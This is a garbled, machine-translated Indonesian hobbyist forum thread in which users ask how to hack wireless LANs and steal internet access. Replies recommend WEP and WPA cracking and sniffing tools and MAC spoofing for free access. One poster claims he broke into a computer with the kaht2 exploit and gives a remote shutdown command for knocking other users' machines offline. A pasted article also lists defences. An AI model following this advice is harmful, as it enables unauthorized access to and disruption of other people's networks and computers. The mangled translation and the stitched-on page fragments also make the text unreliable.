Ndalu gang

Show last 200

Polling
Lates Post
Sell fingerboard where y. .. by vheebhee [Today at 03:46:23 AM]
Tanya Mo. .. More Niy Can ... by Genah_wae [Today at 03:20:28 AM]
help me by botaxalim [Today at 02:04:50 AM]
EXPLANATION PLEASE wearing ... by botaxalim [Today at 01:54:06 AM]
Update March 5, 2010 Cross ... by botaxalim [Today at 01:36:16 AM]
[ASK] Building Network by botaxalim [Today at 01:28:59 AM]
Asus ROG Series 890FX Mot ... by Hazzan [Today at 12:24:06 AM]
guitar hero pc pake maen ... by SYXXness [Yesterday at 11:30:42 PM]
- Post Works 3D Made An ... by B.U.G.S [Yesterday at 10:05:46 PM]
(WTA) Cooling Procie Unru ... by kocek99 [Yesterday at 07:51:45 PM]
[WTA] 915GAV Intel 3x Tit ... by masYogo [Yesterday at 05:45:43 PM]
(Unlocking Test) Biostar ... by sandlewood [Yesterday at 01:37:37 PM]
Software audio player by Tito Haga [Yesterday at 07:20:09 PM]
Adjust DDR3 you ...!!! by masYogo [Yesterday at 05:18:00 PM]
[review] HaPe Modem "ray ... by frozr_man [Yesterday at 05:08:18 PM]
AMD VS INTEL <FIGHT! > By didit_catro '[Yesterday at 04:15:54 PM]
[Ask About] proci Warranty ... by sadnux [March 04, 2010, 11:03:15 PM]
[WTA] How to mbungkam Fan B. .. by SYXXness [March 04, 2010, 08:45:18 PM]
Mainboard 890gx / 890fx by frozr_man [March 04, 2010, 08:44:57 PM]
Creativity Adu Wallpaper by donkey [March 04, 2010, 07:16:40 PM]
Statistic
Members
Total Members: 10,884
Latest: Ricko
Stats
Total Posts: 102,876
Total Topics: 7713
Online Today: 56
Online Ever: 448
(April 04, 2008, 05:10:06 AM)
Users Online
Users: 15
Guests: 61
Total: 76
MARJ1NAL
Gytautas
paulpierce
myscreen
AKA2
citraxeena
best
brewox
arveds
Aero
B.U.G.S
Ricko
damonrulz
coolwin
aikendeva
Visitor MAP

Hot http://www3.clustrmaps.com/counter/maps.php?url=http://www.hyem.org NEWS


The Unordinary Community> Forum> == SOFTWARE ==> Security (Moderator: Light)> Hacking
Wireless LAN!
Pages: [1] Go Down «previous next»
Print

Author Topic: Hacking Wireless LAN! (Read 6005 times)

berang_berang
Trade Count: (0)
[POWERED]
Posting Quality: 0
Offline

Last Login: May 24, 2006, 10:28:54 PM


Posts: 57
HY $ 0.00 credits

View Inventory
Send Money to berang_berang
Topic starter

Hacking Wireless LAN!


«On: March 09, 2006, 01:07:46 PM»

-------------------------------------------------- ------------------------------
Kalo we want to hack the standard w.LAN tools2 what we wrote butuhin, and how gmana?

Gmana way in and gmana bobolnya way?

Trus kalo yg pake linux tools recommended what? kalo windows what?
Kalo mau nyolong gmana Internet connection?

Logged

Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 1 on: March 13, 2006, 01:02:12 PM»

-------------------------------------------------- ------------------------------
kismet for netstumbler & nyari AP or SSID yg buat airsnort active & ngecrack password ...
manual installation & tutorial googling aja. Jgn lupa kalo successful password share ...........

Logged

The Unordinary Community Re: Hacking Wireless LAN!


«Reply # 1: March 13, 2006, 01:02:12 PM»

-------------------------------------------------- ------------------------------

Logged
RooTrick
[Community Member]
Trade Count: (0)
[POWERED]

Posting Quality: 0
Offline

Last Login: September 10, 2009, 11:04:13 PM


Posts: 93
HY $ 36.00 credits

View Inventory
Send Money to RooTrick

Re: Hacking Wireless LAN!


«Reply # 2 on: March 19, 2006, 08:13:19 PM»

-------------------------------------------------- ------------------------------
download dmn tuh om?
trus kalo uda dapet makes source code applications na na gmn?
thx bgt ...
: mrgreen:

Logged

-------------------------------------------------- ------------------------------
Let the world revolves around me ...

densinyo
[Community Member]
Trade Count: (0)
[Enthusiast]

Posting Quality: 0
Offline

Last Login: February 28, 2010, 12:54:59 PM


Posts: 133
HY $ 353.00 credits

View Inventory
Send Money to densinyo

-=- environment ranging from self-=-


Re: Hacking Wireless LAN!
«Reply # 3 on: March 20, 2006, 08:15:01 PM»

-------------------------------------------------- ------------------------------
DL dmn tuh ... boleh dong requested the link ...

Logged

-------------------------------------------------- ------------------------------
T-Force 550! Athlon64 X2 4000 +! Adata 2gb! AcBel 400w! WDC 500GB! Pioneer DVD RW!
Lite-On DVD! A4Tech
-=- environment ranging from self-=-
081-5612-7812

You are not allowed to view links.


Register or Login
You are not allowed to view images.
Please register or login

The Unordinary Community Re: Hacking Wireless LAN!


«Reply # 3: March 20, 2006, 08:15:01 PM»

-------------------------------------------------- ------------------------------

Logged

Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 4 on: March 21, 2006, 03:09:47 PM»

-------------------------------------------------- ------------------------------
I have lg nih project, make antenna can make WiFinya YKPN shoot, there have any experience yg
ga tin bkin antenna?
Search tool material n ada yg tau ga?
This tutorial is reply pd sdikit interest:
You are not allowed to view links.
Register or Login

Logged

MAS
[OprekPC]
Trade Count: (0)
[POWERED]

Posting Quality: 0
Offline

Last Login: April 19, 2008, 06:18:17 PM


Posts: 57
HY $ 221.00 credits

View Inventory
Send Money to MAS

Re: Hacking Wireless LAN!


«Reply # 5 on: August 16, 2006, 02:28:36 AM»

-------------------------------------------------- ------------------------------
This follow aja deh ... You are not allowed to view links.
Register or Login sdh was too old Linux (Auditor following sdh n dah find her hard to replace
Backtrack) tp sure deh, klo you are able to implement, easy wuiiih banged.

one more thing .... wifi chipset election jg jd diliat pertimbangan.bisa here

You are not allowed to view links.


Register or Login

klo for windows, in addition netstumbler pake aja WDRIVER and AirSnort.jamin isa (klo cuman
make WEP) tp klo dah target MAC auth make it give up deh mas ... hehehe, before there isa yg

Logged

-------------------------------------------------- ------------------------------
You are not allowed to view links.
Register or Login
OprekPC ..:::.. Mods - Tweak - Overclock PC

You are not allowed to view links.


Register or Login
Warungplus

still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]

Posting Quality: 8
Offline

Last Login: September 20, 2008, 02:39:26 PM


Posts: 1103
HY $ 444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN!


«Reply # 6 on: December 13, 2006, 01:58:02 PM»

-------------------------------------------------- ------------------------------
gini bro, I'm on campus pake pake internet.tp facility via pc connected via LAN. trus time ta 'clay
found in the network is also connected via laptop2 wifi. I liatnya pake cmd, trus ta 'type "net view"
out tu laptop2nya. can ta 'not hacked from the pc I pake?
thanks ya ... (just curious, do not want to harm everybody)

Logged

psyCHo_L061c
Trade Count: (0)

Posting Quality: 0
Offline

Last Login: January 09, 2007, 09:24:31 PM


Posts: 2
HY $ 0.00 credits
View Inventory
Send Money to psyCHo_L061c

Re: Hacking Wireless LAN!


«Reply # 7 on: January 08, 2007, 04:52:37 PM»

-------------------------------------------------- ------------------------------
bisa aja om mah ..... hehehehe it easy, if u could've and taw gimana cara fingerprinting and foot
printingnya oms
trus taw a bug we're looking for security holes or it is what there do ,,,...... hehehehehehe so i am
just newbie

Logged

still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]

Posting Quality: 8
Offline

Last Login: September 20, 2008, 02:39:26 PM


Posts: 1103
HY $ 444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN!


«Reply # 8 on: January 26, 2007, 08:04:29 PM»

-------------------------------------------------- ------------------------------
Quote from: psyCHo_L061c on January 08, 2007, 04:52:37 PM
bisa aja om mah ..... hehehehe it easy, if u could've and taw gimana cara fingerprinting and foot
printingnya oms
trus taw a bug we're looking for security holes or it is what there do ,,,...... hehehehehehe so i am
just newbie

well, I mbok diajarin lha mas ... I still underneath a newbie


hehee

Logged
The Unordinary Community Re: Hacking Wireless LAN!
«Reply # 8: January 26, 2007, 08:04:29 PM»

-------------------------------------------------- ------------------------------

Order: hyem_toko

Logged

silverx
Trade Count: (0)
[Enthusiast]

Posting Quality: 1
Offline

Last Login: June 18, 2008, 02:50:14 PM


Posts: 121
HY $ 120.00 credits

View Inventory
Send Money to silverx

Enjoy Life It's ......


Re: Hacking Wireless LAN!
«Reply # 9 on: March 17, 2007, 11:41:56 AM»

-------------------------------------------------- ------------------------------
These tools can be useful for browsing sangant increasingly entering a network, Cain And Abel via
google search .... aj certainly can, install and run, there you can open companies that adapada
network, although worgroupnya different ...........................
I was confused for existing antenna tutorinya above, connect to port ake PCnya hell? pake serial?
ato pake USB?? his antennae cuman doang ditutorial !!!!!!!!!!! 1

Logged

-------------------------------------------------- ------------------------------
"Have Something In Need, Not according Desire "....

Arwan
Trade Count: (0)
Interest ..

Posting Quality: -1
Offline

Last Login: June 11, 2007, 11:16:42 PM


Posts: 11
HY $ 4.00 credits

View Inventory
Send Money to Arwan

never ending learning

Re: Hacking Wireless LAN!


«Reply # 10 on: April 07, 2007, 06:23:01 AM»

-------------------------------------------------- ------------------------------
Netstumbler, Kismet, and Aeroneet / aeropeek

its stuf ...


kismet make a reply to its plasticity mac address he kalo ga active we can use to change the MAC
address of our ... or you want to try "man in the middle"?

aeropeek can open either AP WEP WPA reply ... (not nyoba)
ASCII is usually encrypted so we look for similarities alone ... and may be divided into 4 atao like
ASCII codenya'll see ...
This can also be used for the man in the middle attack

There is no reply aeropeek MBO software I shared ... my software got damaged jeefo, and it is the
master .... kalo download more males (trial)

cmiiw

Logged

-------------------------------------------------- ------------------------------
i have my own journey

lelahana
Trade Count: (0)

Posting Quality: 0
Offline

Last Login: November 10, 2007, 04:43:39 PM


Posts: 4
HY $ 1.00 credits

View Inventory
Send Money to lelahana

Re: Hacking Wireless LAN!


«Reply # 11 on: April 09, 2007, 04:05:09 PM»

-------------------------------------------------- ------------------------------
sadisssssss ....
wah .... kckckckckckc linings semuanyajago ..
but the reply requested diajarin way, there are going ga?
jadi pengen nih ... curious buanget ga tau .... but how ...
ajarin dunks .. : '(:' (: '(:' (: '(:' (

Logged

arbangun
GamerZ, Coder & Carding
Trade Count: (0)
[Enthusiast]

Quality posts: 2
Offline

Last Login: October 19, 2009, 02:03:55 PM


Posts: 130
HY $ 40.00 credits

View Inventory
Send Money to arbangun

ARB'S Coorp

Re: Hacking Wireless LAN!


«Reply # 12 on: April 13, 2007, 12:52:50 PM»

-------------------------------------------------- ------------------------------
NUAMBAAAHHIIINN ... waaakaaakaa .....

coba pake APSniffer


trus ethereal (wireshark)
ama APsnort

tu pake tool, klo ga slh we can pass ama dpet username for log-on.

hmmm ya no more for a computer intruder detection can try jg nih pake this way

Quote
== MENDITEKSI NETWORK THROUGH intruder DOS ==

BEGIN

* INTRODUCTION: Maybe we do not realize if we play that there diwarnet


we are monitoring whether it adminya or prankster who want
steal information from us, so with that I will be a bit trying to see
or premises only mendetiksinya dos command!

It turned out there at Dos facility that may we all forgotten and rarely used
command is NETSTAT. Windows provides this command to support
network. Netstat can also be used to see the ip-ip that are connected
into our computer.
For that open the dos command you, you know how: d if ga tau nich:
- Start> Run> command.exe [for Win 95/98]
- Start> Run> cmd.exe [for a win 2000/XP / nt]
then the command prompt appear deh

C: \ WINNT> netstat?
Displays protocol statistics and current TCP / IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.


-e Displays Ethernet statistics. This may be combined with the-s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the-s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the-p option may be used to specify
a subset of the default.
dedisplays interval selected statistics, Pausing interval seconds
between each display. Press CTRL + C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Now we use netstat to see the connections that are connected using-a

C: \ WINNT> netstat-a
Proto Local Address Foreign Address State
TCP me: http me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: epmap me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: https me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: microsoft-ds me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1025 me.ladomain.lintasarta.co.id: 0 LISTENING

TCP me: 1027 me.ladomain.lintasarta.co.id: 0 LISTENING


TCP me: 1028 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1071 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1146 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1163 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1253 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1261 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1288 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1306 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1314 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 5101 me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: epmap 10.22.1.236:4504 TIME_WAIT
TCP me: netbios-ssn me.ladomain.lintasarta.co.id: 0 LISTENING
TCP me: 1071 LAJKTTS02: 1080 ESTABLISHED
TCP me: 1288 IS ~ HRS: microsoft-ds ESTABLISHED
TCP me: 1306 GREENGUY: microsoft-ds ESTABLISHED
UDP to: 1134 *.*

the pc name is the port used for connection.


netstat on my office computer using ip using dhcp.
Here we can see anyone who wrote a computer connected in our
or with a more obvious example of this. For more details, I will try
infiltrate other people's computers by using kaht2: d
and I'm able to infiltrate.

C: \ WINDOWS \ system32> netstat-a


Active Connections

Proto Local Address Foreign Address State


TCP khs_2003: epmap khs_2003: 0 LISTENING
Khs_2003 TCP: microsoft-ds khs_2003: 0 LISTENING
TCP khs_2003: 1025 khs_2003: 0 LISTENING
TCP khs_2003: 1063 khs_2003: 0 LISTENING
TCP khs_2003: 1093 khs_2003: 0 LISTENING
TCP khs_2003: 1136 khs_2003: 0 LISTENING
TCP khs_2003: 1138 khs_2003: 0 LISTENING
TCP khs_2003: 5000 khs_2003: 0 LISTENING
TCP khs_2003: 43,715 khs_2003: 0 LISTENING
TCP khs_2003: epmap 10.21.3.17:3628 TIME_WAIT <------ 1
TCP khs_2003: epmap 10.21.3.50:1686 FIN_WAIT_2 <------ 2
Khs_2003 TCP: netbios-ssn khs_2003: 0 LISTENING
TCP khs_2003: 1093 10.21.1.18:8080 CLOSE_WAIT
Khs_2003 TCP: ESTABLISHED 1136 10.21.1.18:8080
Khs_2003 TCP: ESTABLISHED 1138 10.21.1.18:8080
TCP khs_2003: 11,196 khs_2003: 0 LISTENING
TCP khs_2003: 43715 10.21.3.50:1687 ESTABLISHED <------ 3
UDP khs_2003: microsoft-ds *: *
UDP khs_2003: isakmp *: *
Khs_2003 UDP: 1028 *: *
Khs_2003 UDP: 1035 *: *
Khs_2003 UDP: ntp *: *
Khs_2003 UDP: netbios-ns *: *
Khs_2003 UDP: netbios-dgm *: *
Khs_2003 UDP: 1900 *: *
UDP khs_2003: 13715 *: *
UDP khs_2003: 61804 *: *
Khs_2003 UDP: ntp *: *
Khs_2003 UDP: 1032 *: *
Khs_2003 UDP: 1036 *: *
Khs_2003 UDP: 1107 *: *
Khs_2003 UDP: 1134 *: *
Khs_2003 UDP: 1900 *: *
This computer is in susupi by I look nya.pada port number 3 is
kaht2 open ports to a computer sploit know.
and how we how we are to know the name of the computer being
infiltrate into our computer. Use nbtstat-a
C: \ WINDOWS \ system32> nbtstat-a [ip]
C: \ WINDOWS \ Syetem32> nbtstat-a 10.21.3.50
Heart:
Node Ipaddress: [10.21.3.50] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status


---------------------------------------------
ME <00> UNIQUE Registered
ME <20> UNIQUE Registered
Workgroup <00> GROUP Registered
Workgroup <1E> GROUP Registered
ME <03> UNIQUE Registered
Inet ~ Services <1C> GROUP Registered
IS ~ ME ..........< 00> UNIQUE Registered

MAC Address = 00-60-08-29-37-48

Take a look at it ip 10.21.3.50 pc name is me, and he join the workgroup.


We can make a peep surprised we were to use that facility netsend
only in a win 2000/XP or nt.

C: \ WINNT> net send [ip / pc name] [message]

Actually there's more fasilitas2 dos that can be used for fun

or reply to idle moment nigh pake try this formula

Quote
taw for the host name of the destination computer .. pake scans can also be angry.
deh after that type in the command prompt eg:
c: / shutdown-s-f-m \ \ abcd-t 20
tu gone in 20 seconds, the client computer will shutdown .. violence ... : '(

«Last Edit: April 13, 2007, 12:55:48 PM by arbangun» Logged

-------------------------------------------------- ------------------------------
E2140 @ 3.2 Ghz | Mobo Biostar 945G Micro 775SE Ext | A-Data 2x1GB 800 PC6400 | LiteOn
DVD-RW | HIS X700Pro IceQ 256/128MB PCIe | LG LCD monitors 21 "
You are not allowed to view images.
Please register or login
You are not allowed to view links.
Register or Login
You are not allowed to view images.
Please register or login

Arwan
Trade Count: (0)
Interest ..
Posting Quality: -1
Offline

Last Login: June 11, 2007, 11:16:42 PM


Posts: 11
HY $ 4.00 credits

View Inventory
Send Money to Arwan

never ending learning

Re: Hacking Wireless LAN!


«Reply # 13 on: April 14, 2007, 04:22:42 AM»

-------------------------------------------------- ------------------------------
lho kalo mas remote computer system of his victim's ga ga diaktifin can shutdown the victim with
the command C: \ shutdown .... cmiiw

yup, ethereal function read (read: capture) a message or data that flows on the network, so the
current data flow can be seen, what is opened, what data is sent if the email, myspace or something,
but can not seem to pass data https or secure socket layer, fix if I'm wrong

«Last Edit: April 14, 2007, 04:54:26 PM by Arwan» Logged

arbangun
GamerZ, Coder & Carding
Trade Count: (0)
[Enthusiast]

Quality posts: 2
Offline

Last Login: October 19, 2009, 02:03:55 PM


Posts: 130
HY $ 40.00 credits

View Inventory
Send Money to arbangun

ARB'S Coorp

Re: Hacking Wireless LAN!


«Reply # 14 on: April 16, 2007, 04:13:39 PM»

-------------------------------------------------- ------------------------------
More from yesterday ..... ADDITIONAL PAKE PInter BIAR BHS. ENGGRIS YES ...

Wireless Hacking Tools

Anyone interested in Gaining a deeper knowledge of wireless security and Exploiting


vulnerabilities will need a good set of base tools with which to work. Fortunately, there are an
Abundance of free tools available on the Internet. This list is not meant to be comprehensive in
nature but rather to provide some general guidance on recommended tools to build your toolkit.

Finding Wireless Networks

Locating a wireless network is the first step in trying to exploit it. There are two tools that are
commonly used in this regard:

Network stumbler aka NetStumbler - This Windows based tool easily finds wireless signals being
broadcast within range - A must have. It also has ability to determine Signal / Noise info that can be
used for site surveys. I actually know of one highly known public wireless hotspot provider that
uses this utility for their site surveys.
You are not allowed to view images.
Please register or login

You are not allowed to view links.


Register or Login
Kismet [url] http://www.kismetwireless.net/Kismet
[/ url] - One of the key functional elements missing from NetStumbler is the ability to display
Wireless Networks that are not broadcasting their SSID. As a potential wireless security expert, you
should Realize that Access Points are routinely broadcasting this info; it just is not being read /
deciphered. Kismet will detect and display SSIDs that are not being broadcast which is very critical
in finding wireless networks.

You are not allowed to view images.


Please register or login

Attaching to the Found Wireless Network


Once you've found a wireless network, the next step is to try to connect to it. If the network is not
using any type of authentication or encryption security, you can simply connect to the SSID. If the
SSID is not being broadcast, you can create a profile with the name of the SSID that is not being
broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network
is using authentication and / or encryption, you may need one of the following tools.

Airsnort - This is a very easy to use tool that can be used to Sniff and crack WEP keys. While many
people bash the use of WEP, it is certainly better than using nothing at all. Something you'll find in
using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional
tools and strategies that can be used to force the generation of traffic on the wireless network to
shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.

You are not allowed to view images.


Please register or login

You are not allowed to view links.


Register or Login
CowPattyCowPatty
- This tool is used as a brute force tool for cracking WPA-PSK, considered the "New WEP" for
home Wireless Security. This program simply tries a bunch of different options from a dictionary
file to see if one ends up matching what is defined as the Pre-Shared Key.

You are not allowed to view images.


Please register or login

You are not allowed to view links.


Register or Login
ASLeapASLeap
- If a network is using LEAP, this tool can be used to gather the authentication data that is being
passed across the network, and these sniffed credentials can be cracked. LEAP does not protect the
authentication like other "real" EAP types, which is the main reason why LEAP can be broken.

You are not allowed to view images.


Please register or login

Sniffing Wireless Data

Whether you are directly connected to a wireless network or not, if there is wireless network in
range, there is data flying through the air at any given moment. You will need a tool to be able to
see this data.

Ethereal - While there has been much debate on the proper way to pronounce this utility, there is no
question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and
comes with some robust filtering capabilities. It can also be used to Sniff-out 802.11 management
beacons and probes and subsequently could be used as a tool to Sniff-out non-broadcast SSIDs.

You are not allowed to view images.


Please register or login

You are not allowed to view images.


Please register or login

The aforementioned utilities, or similar ones, will be Necessities in your own wireless security
toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab
environment. And cost is no excuse as all of these tools are available freely on the Internet.

Protecting Against These Tools

Just as it's important to know how to utilize the aforementioned tools, it is important to know best
practices on how to secure your Wireless Network Against these tools.

NetStumbler - Do not broadcast your SSID. Ensure your WLAN is protected by using advanced
Authentication and Encryption.
Kismet - There's really nothing you can do to stop Kismet from finding your WLAN, so Ensure
your WLAN is protected by using advanced Authentication and Encryption

Airsnort - Use a 128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your
equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software
update).

Cowpatty - Use a long and complex WPA Pre-Shared Key. This type of key would have less of a
chance of Residing in a dictionary file that would used to be try and guess your key and / or would
take longer. If in a corporate scenario, do not use WPA with Pre-Shared Key, use a good EAP type
to protect the authentication and limit the amount of incorrect guesses that would take place before
the account is locked-out. If using certificate-like functionality, it could also validate the remote
system trying to gain access to the WLAN and not allow a rogue system access.

ASLeap - Use long and complex credentials, or better yet, switch to EAP-FAST or a different EAP
type.

Ethereal - Use encryption, so that anything sniffed would be difficult or nearly impossible to break.
WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP will
encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption), use
application layer encryption, like Simplite to encrypt your IM sessions, or use SSL. For corporate
users, use IPSec VPN with split-tunneling disabled. This will force all traffic leaving the machine
through an encrypted tunnel that would be encrypted with DES, 3DES or AES.

Logged

Jenggo
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 15 on: April 16, 2007, 10:42:34 PM»

-------------------------------------------------- ------------------------------
Ato okay how fuzzing
This reply is more relaxed, more 'polite' ..
Yg cmn clearly not useful for WLAN doang ..

full info: You are not allowed to view links.


Register or Login

Logged

still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]

Posting Quality: 8
Offline

Last Login: September 20, 2008, 02:39:26 PM


Posts: 1103
HY $ 444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN!


«Reply # 16 on: April 18, 2007, 04:04:48 PM»

-------------------------------------------------- ------------------------------
kalo the MAC address, instead of a software tuh make change MAC address?
anyone ever tried blom? a good tu be replaced kalo, can be many hours free access .... hehee

Quote from: silverx on March 17, 2007, 11:41:56 PM


These tools can be useful for browsing sangant increasingly entering a network, Cain And Abel via
google search .... aj certainly can, install and run, there you can open companies that adapada
networks, although different worgroupnya ...........................
I was confused for existing antenna tutorinya above, connect to port ake PCnya hell? pake serial?
ato pake USB?? his antennae cuman doang ditutorial !!!!!!!!!!! 1

kalo ndak wrong, I had also been mbaca similar articles. yes the cord tied to a WLAN antenna. gak
tau deh, kalo gak pake WLAN antenna can be anything ndak.jadi not pake usb, serial.kalo ndak a
diameter of the can also be adjusted to?

Logged

Panji
[Here To Help]
[Super Admin]
Trade Count: (2)
[Hyper]

Posting Quality: 72
Offline

Last Login: Today at 01:44:28 AM


Posts: 2515
HY $ 9654.00 credits
View Inventory
Send Money to Panji

Everything (better / worse) start from '1 '

Re: Hacking Wireless LAN!


«Reply # 17 on: April 18, 2007, 05:40:04 PM»

-------------------------------------------------- ------------------------------
HYEM will launch DISTRO "Hyper-Tux's", .. a special distribution tool2 fully-equipped for water
underground hacking and attack .. !! tunggu aja ... the HYEM Bonus DVD edition 7!!

Logged

-------------------------------------------------- ------------------------------
just trying to serve You ...
You are not allowed to view images.
Please register or login
work as hard as u can .. and .. be as simple as u can, to be part of Others!

Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 18 on: April 19, 2007, 03:19:49 PM»

-------------------------------------------------- ------------------------------
Crack WEP can be read at the 2nd edition HyperMedia Magazine.

Logged

still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]

Posting Quality: 8
Offline

Last Login: September 20, 2008, 02:39:26 PM


Posts: 1103
HY $ 444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN!


«Reply # 19 on: April 20, 2007, 11:48:18 AM»

-------------------------------------------------- ------------------------------
bro all, mo nanya nih, kalo through Cain and abel dah dapet ip address, port, ama SSID, trus gimana
biar bisa nge-purpose remote computer?

Logged

aghya
[Community Member]
Trade Count: (0)
[Enthusiast]

Posting Quality: 0
Offline

Last Login: June 14, 2008, 09:49:04 PM


Posts: 109
HY $ 99.00 credits

View Inventory
Send Money to aghya

Re: Hacking Wireless LAN!


«Reply # 20 on: June 23, 2007, 07:53:36 PM»

-------------------------------------------------- ------------------------------
Quote from: Panji on April 18, 2007, 05:40:04 PM
HYEM will launch DISTRO "Hyper-Tux's", .. a special distribution tool2 fully-equipped for water
underground hacking and attack .. !! tunggu aja ... the HYEM Bonus DVD edition 7!!

Oh well .. it .. I'm waiting ... 7th edition of the publication date when?

Logged

-------------------------------------------------- ------------------------------
Venice 3000 + @ 2600 (daily) .. so far
DFI LP UT Nf4 Ultra-D (bios NF4LD406 04/06/2006)
Patriot 512 DDR 3200
Forsa GeForce 6600 GT
Samsung SATA 80
EXtreme 500

inou
Nubi all the time ... : D
[Community Member]
Trade Count: (2)
[EXTREME]

Posting Quality: 1
Offline

Last Login: July 06, 2009, 03:57:59 PM


Posts: 563
HY $ 82.00 credits

View Inventory
Send Money to inou

.: Lets Fill The World With Smile:.

Re: Hacking Wireless LAN!

-------------------------------------------------- ------------------------------

-------------------------------------------------- ------------------------------
-------------------------------------------------- ------------------------------
!!

-------------------------------------------------- ------------------------------
-------------------------------------------------- ------------------------------
-------------------------------------------------- ------------------------------

-------------------------------------------------- ------------------------------

Sumbangkan terjemahan yang lebih baik


Terima kasih telah menyumbangkan saran terjemahan Anda ke Google Terjemahan.
Menyumbangkan terjemahan yang lebih baik:
Home Forum Help Arcade Calendar Shop LIVE CHAT button GoogleTagged Login Register <br>
<br> Input To officials Forum HYPERMEDIA <br>You are not allowed to view links.
<br>Register or Login <br>click here and post <br> <br> <br> <br>The Unordinary <br> Enter
your search terms <br> Web hyem.org <br>Submit search form <br> <br>You are not allowed to
view images. <br>Please register or login <br> <br> <br> <br>Welcome, Guest. Please login or
register. <br>March 06, 2010, 05:55:13 PM <br> 1 Hour 1 Day 1 Week 1 Month Forever
<br>Login with username, password and session length <br>Pricelist Update!! <br>PriceList
UPDATE =&gt; You are not allowed to view links. <br>Register or Login (last updated 2009 Oct
21) <br> <br> <br>Dragon Xitro Hyper-3D Design AP1 <br>II Phenom X4 Deneb From X2, DFI
LP DK 790FXB-M2RS, Palit HD 4850, OCZ Gold Edition 2 x 1GB, 500 GB WDC 16 MB,
Enhance 400W ATX + True <br>PROMO: Rp. 4,978,765, -- <br> <br>Xitro Hyper-Fire Dragon
AP1 <br>Kuma Athlon X2 7750 +, abit AX78 AMD 770 / SB600 CrossFire Platform OTES
Dragon, Saphire HD4830/HD4770, 2x2G OCZ Gold Ed 8500 CL5, WDC 320 GB 16 MB, Foxconn
Case + PSU <br>PROMO: Rp. 4,498,765, -- <br>BEST SELLER ...!!!! <br> <br>Hyper XITRO
Designer AP2 <br>Core2Quad Q8400, DFI LP GF9400-T2RS Junior Hybrid SLI, OCZ Fatality
Edition 2X2G, WDC 500 GB 16 MB, Foxconn Case + PSU True (Graph DESIGNER PC)
<br>PROMO: Rp. 4,454,545, -- <br> <br>Toxic Hyper-Dragon Xitro ACF <br>II Phenom X4
from 550BE, DFI LP BI-M35 CrossFireX 785G Dragon Platform, HD4830 Palit 256bit, DDR3
OCZ Fatality Edition 2X2G, 500 GB WDC, 400W Enhance True + (FREE VENDETA II for Fist
buyer everyday) <br>PROMO: Rp. 4,976,543, -- <br> <br>Hyper-Dragon Xitro Epix <br>Athlon
II X2@3.5Ghz from sargas 140 + BIOSTAR TA785GE 128 CF, Palit HD4650 Super 512MB
128bit, DDR2 2X1G, 160GB WDC 16 MB, ATX 400W <br>PROMO: Rp. 2,525,252, -- <br>
<br>| LCD 15.6 &quot;+ Key + Mouse = Rp. 950rb | LCD 19&quot; + Key + Laser Mouse = Rp.
1.300rb | LCD 16 &quot;+ Key + Mouse = Rp. 990rb | <br> <br>Palit HD4870 <br>Palit HD4870
Sonic Dual Edition DDR5, 512MB, 256bit OC 775/4000 Dual Speed (in some cases is still 256bit
graphics lbh dr 5770 128bit superior, let alone reply we see from the price / performancenya)
<br>PROMO: $ 150 <br> <br>Palit HD4850 <br>Palit HD4830 DDR3, 512MB, 256bit, Core: 575
/ Mem: 1800Mhz + HDMI <br> <br>Youngest brother of the family RV770, Still be the Price /
Performance King! <br>PROMO: $ 90 <br> <br>Palit HD3850 Super DDR3 <br>RV 670, 256
MB DDR3, 256bit, 670MHZ, 1660MHZ, 319 <br> <br>With DDR3, High-end card is legendary
high-end display card under $ 100, especially for high-OC .. This babe is the Most Value King!
<br>PROMO: $ 78, 512M: $ 65 <br> <br>ALL AVAILAVBE <br> <br>Chat Now! <br> <br>
[more] <br>Last 20 Shouts: <br>--------------------------------------------------
------------------------------ <br> <br>Panji <br>Today at 01:44:28 AM <br>Good for Hendy hyem ..
lu ganyangka win bro .. <br>an35 <br>Today at 12:50:18 AM <br>let kumbah-kumbah
